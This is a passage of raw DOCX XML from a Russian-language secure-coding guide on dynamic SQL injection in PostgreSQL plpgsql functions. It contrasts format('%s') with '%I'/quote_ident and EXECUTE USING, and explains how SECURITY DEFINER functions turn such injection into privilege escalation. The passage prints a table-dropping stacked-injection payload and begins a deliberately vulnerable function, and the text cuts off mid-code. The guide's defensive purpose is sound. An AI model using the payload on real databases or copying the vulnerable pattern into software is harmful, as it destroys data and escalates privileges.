          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через extended protocol. Не работает для identifier.</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`format('%s', x)` или `||`-concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">антипаттерны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, всегда уязвимы, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не валидирован.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16 — это серверный mirror application-side identifier injection (3.14.2). В отличие от application-кода, plpgsql работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутри PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и часто </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в SECURITY DEFINER контексте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для делегирования прав) — payload получает права owner-а функции, что в худшем случае означает superuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mini-таблица: пять подразделов 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Конструкция</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Назначение</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Антипаттерн</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Защита</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format('%s' / '%I', x)</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identifier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 для имени таблицы/колонки</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%I</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quote_ident(x)</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identifier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concat без quote_ident + case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quote_ident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + ASCII-check</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EXECUTE ... USING $1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value (bind)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USING для identifier (не работает)</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USING для значений, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для имён</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`EXECUTE '...' \</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x \</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SECURITY DEFINER + dynamic SQL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privilege elevation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dynamic SQL внутри SD-функции</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wrap всех 3.16.1–3.16.4 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SET search_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side analog (то же бременности bind-протокола, но в Python/Java коде). Граница: 3.14.2 — application; 3.16 — серверный plpgsql.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payload в 3.16.1/3.16.4 — это классический stacked-injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутри plpgsql EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт через simple-protocol-equivalent (sequential statements в текстовом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параллельный класс уязвимостей в SECURITY DEFINER (search_path hijack); 3.16.5 — dynamic SQL injection в SD-функции. Граница: 3.13.6 — hijack unqualified имени; 3.16.5 — injection в text dynamic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 3.7.2 / 3.7.3 RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — successful 3.16.5 payload в superuser-owned SD-функции эскалирует в полный RCE через те же векторы.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5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая reference по защитным функциям; 3.16 — детали в attack-context.</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format('%s')</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 основная карточка R18, прямая identifier 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и ограничения — case-folding bypass whitelist, не для значений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3.16.3</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 ... USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — безопасный pattern для значений,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для identifier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3.16.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Конкатенация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самый прямой антипаттерн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SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо: identifier injection × elevation prev (5.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все пять подразделов 3.16 — варианты одной ошибки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic SQL строится из user-controlled identifier без `%I`/`quote_ident`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Причина — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">синтаксическое ограничение PostgreSQL Wire Protocol</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1. Bind-параметр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подставляется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не как identifier. Это design-решение (binary-typed serialization).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Identifier попадает в parse-tree на стадии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, до Bind. Это означает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только текстовая подстановка возможна для identifier</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3. PostgreSQL предоставляет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format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> именно для безопасной текстовой подстановки — но разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">должен это вызвать</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Когда plpgsql функция работает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> контексте, payload эскалирует от «execute SQL as caller» до «execute SQL as function owner». В типичном multi-tenant сетапе owner таких функций — superuser или DBA, что превращает identifier-injection в полноценную privilege escalation chain. Это эквивалент 3.13.6 (search_path hijack), но через другой механизм —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 injection вместо unqualified name resolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стек примеров</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все примеры в 3.16 — на plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не Python+SQLAlchemy. Причина (документирована в CLAUDE.md): инъекция серверная, язык приложения не важен — application-код выглядит как обычный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT my_function(:user_input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, вся уязвимость в теле функции. Показывать application-обёртку без plpgsql-body — это убрать сам объект уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где relevant, мы показываем minimal application-caller (FastAPI route, вызывающий функцию) — для context-а как именно user-input попадает в функцию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.1 format('%s') vs format('%I') (R18)</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PostgreSQL функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format(formatstr, args...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный способ построения dynamic SQL в plpgsql. Поддерживает три conversion specifiers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`%s`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (string substitution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без quoting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`%I`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (identifier quoting — добавляет double-quotes и удваивает внутренние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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`%L`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (literal quoting — добавляет single-quotes, удваивает внутренние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Базовая ошибка: разработчик пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('SELECT * FROM %s', tbl_name)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подставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сырую строку без quoting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приходит от пользователя, payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> собирает stacked-injection внутри dynamic SQL. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R18 — это именно этот класс</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для identifier, типичный mistake разработчиков, привыкших к C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (где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 общая string).</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Уязвимая функция: dynamic SELECT с переданным именем таблицы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Owner функции: application_admin (имеет SELECT/INSERT/UPDATE/DELETE на все таблицы tenant-схем)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- USAGE на функцию выдан application-роли через GRANT EXECUTE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app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS bigint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result bigint;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%s для identifier-имени</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
